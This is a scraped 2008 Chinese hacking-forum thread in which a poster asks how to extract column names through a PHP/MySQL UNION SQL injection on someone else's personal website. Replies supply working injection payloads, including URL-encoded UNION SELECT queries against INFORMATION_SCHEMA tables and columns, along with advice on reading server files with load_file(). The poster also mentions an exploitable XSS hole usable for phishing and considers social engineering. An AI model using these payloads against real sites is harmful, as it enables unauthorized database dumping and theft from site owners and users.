标题:
[讨论]php注入找不到列名怎么办?
[打印本页]
作者:
冰绿茶
时间:
2008-7-20 23:26
标题:
[讨论]php注入找不到列名怎么办?
[讨论]php注入找不到列名怎么办?
信息来源:邪恶八进制信息安全团队(
www.eviloctal.com
)
议题作者: ゛小︷帅!﹊
不知道列名,看网站的样子是个人自己做的,也比较大。但是存在php注入。
用的是支持union查询的mysql(术语不专业勿笑!)
复制内容到剪贴板
代码:
union select TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME from information_schema.STATISTICS/*
出现sq_blmk、bbs、b_id
当我提交
复制内容到剪贴板
代码:
an 1=2 union select b_id,2,3 from bbs /*
返回一个10,就是1那个位置被代替了
复制内容到剪贴板
代码:
and 1=2 union select 1,2,3 from bbs where b_id=10 /*
我实在找不到。后台的原文件里的2个列名不对,看起来是正常的,但是就是不对的
复制内容到剪贴板
代码:
{
if (ltrim(document.login_form.pma_username.value)=="") {
alert("请填写您的帐户ID!");
return false;
}else if (ltrim(document.login_form.pma_password.value)=="") {
alert("请填写您的登陆密码!");
return false;
}else {
document.login_form.action="login.php";
document.login_form.method="post";
return true;
}
}
列名带进去无法返回。
SO,小菜不知道下步怎么解决,是否可以用模糊查找?
ps:账号看起来不是root权限的。
用loadfile()读过了。没反应……
当然,HDSI,什么什么的工具+字典也试了,还是不行。
留言存在xss跨站。
在那钓鱼就算了,我也没那个闲情,学这个php注入花了3天,阅读了大量的文献资料。
实在不行,我可能要用社会工程学。不排除(见笑!)
但是……小菜不才,特来请教各位大牛。
帖子58 精华
0
积分155 阅读权限40 来自杭州 在线时间152 小时 注册时间2007-9-29 最后登录2008-7-16
查看个人网站
查看详细资料
引用
报告
回复
TOP
爱要怎么说出口
沉渊
晶莹剔透§烈日灼然
作者:
木瓜
时间:
2008-7-20 23:26
试试从information_schema.tables和information_schema.columns里面去暴。
p.s:建议多看看angel他们以前的文章,虽然很老,但是很经典Dreamless world……
帖子25 精华
0
积分179 阅读权限40 性别男 在线时间215 小时 注册时间2007-2-11 最后登录2008-6-30
查看详细资料
引用
报告
回复
TOP
爱要怎么说出口
゛小︷帅!﹊
晶莹剔透§烈日灼然
作者:
技安
时间:
2008-7-20 23:26
引用:
试试从information_schema.tables和information_schema.columns里面去暴。
暴不出。
看来我得继续看文章去了。
谢谢你提供的一些思路和参考,小菜感激不尽。
帖子58 精华
0
积分155 阅读权限40 来自杭州 在线时间152 小时 注册时间2007-9-29 最后登录2008-7-16
查看个人网站
查看详细资料
引用
报告
回复
TOP
您知道您年薪应是多少?
akens
晶莹剔透§烈日灼然
作者:
dgctzxs
时间:
2008-7-20 23:26
先用union%20select%200,1,TABLE_NAME,3,4%20FROM%20INFORMATION_SCHEMA.TABLES--把所有的表暴出来
再用union%20select%200,1,COLUMN_NAME,3,4%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=要查询的表名
屡试不爽
帖子22 精华
0
积分59 阅读权限40 性别男 在线时间106 小时 注册时间2006-9-30 最后登录2008-6-21
查看详细资料
引用
报告
回复
TOP
fatcat
晶莹剔透§烈日灼然
作者:
zjj
时间:
2008-7-20 23:26
如果知道路径的话,用经典注射是能够读出源码的。很多时候由于页面关系显示不出代码,其实一般基本可以loadfile()。
其实一般情况MYSQL4以上加上路径的话基本可以搞,不过MYSQL3我就一直搞不来晕啊晕
帖子45 精华
0
积分145 阅读权限40 性别男 来自浙江 在线时间68 小时 注册时间2004-11-9 最后登录2008-7-2
查看详细资料
引用
报告
回复
TOP
让女孩一夜变的更有女人味
゛小︷帅!﹊
晶莹剔透§烈日灼然
作者:
纯银
时间:
2008-7-20 23:26
引用:
如果知道路径的话,用经典注射是能够读出源码的。很多时候由于页面关系显示不出代码,其实一般基本可以loadfile()。
其实一般情况MYSQL4以上加上路径的话基本可以搞,不过MYSQL3我就一直搞不来
谢谢你的指导。
但是mysql.
这个是需要root权限的
我所搜到的不是root 权限的
loadfile()
读不出来。
帖子58 精华
0
积分155 阅读权限40 来自杭州 在线时间152 小时 注册时间2007-9-29 最后登录2008-7-16
查看个人网站
查看详细资料
引用
报告
回复
TOP
少女暴富的隐秘(图)
longhai
晶莹剔透§烈日灼然
作者:
原始宝宝
时间:
2008-7-20 23:26
知道路径,就用经典注射读出源码。
帖子20 精华
0
积分63 阅读权限40 性别男 在线时间6 小时 注册时间2007-4-4 最后登录2008-4-24
查看详细资料
引用
报告
回复
TOP
让女孩一夜变的更有女人味
yinhao
晶莹剔透§烈日灼然
作者:
chc2203
时间:
2008-7-20 23:26
这个暴库的前提条件是 数据库版本>5的
帖子16 精华
0
积分29 阅读权限40 性别男 在线时间6 小时 注册时间2007-1-28 最后登录2008-7-17
查看详细资料
引用
报告
回复
TOP
nixilin
晶莹剔透§烈日灼然
作者:
释迦牟尼
时间:
2008-7-20 23:26
引用:
引用第1楼沉渊于2007-12-28 17:12发表的 :
试试从information_schema.tables和information_schema.columns里面去暴。
p.s:建议多看看angel他们以前的文章,虽然很老,但是很经典
相当受用……
To LZ 用user()就可以查看当前连接数据库的用户名了。。
帖子87 精华
0
积分298 阅读权限40 性别男 在线时间26 小时 注册时间2006-4-22 最后登录2008-7-14
查看详细资料
引用
报告
回复
TOP
jxsaqjh
晶莹剔透§烈日灼然
作者:
小树
时间:
2008-7-20 23:26
引用:
引用第6楼longhai于2008-01-01 00:35发表的 :
知道路径,就用经典注射读出源码。
不是ROOT用什么读文件?jxsaqjh.cn
帖子36 精华
0
积分99 阅读权限40 性别男 在线时间15 小时 注册时间2006-10-23 最后登录2008-4-9
查看详细资料
引用
报告
回复
TOP
kosi
晶莹剔透§烈日灼然
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2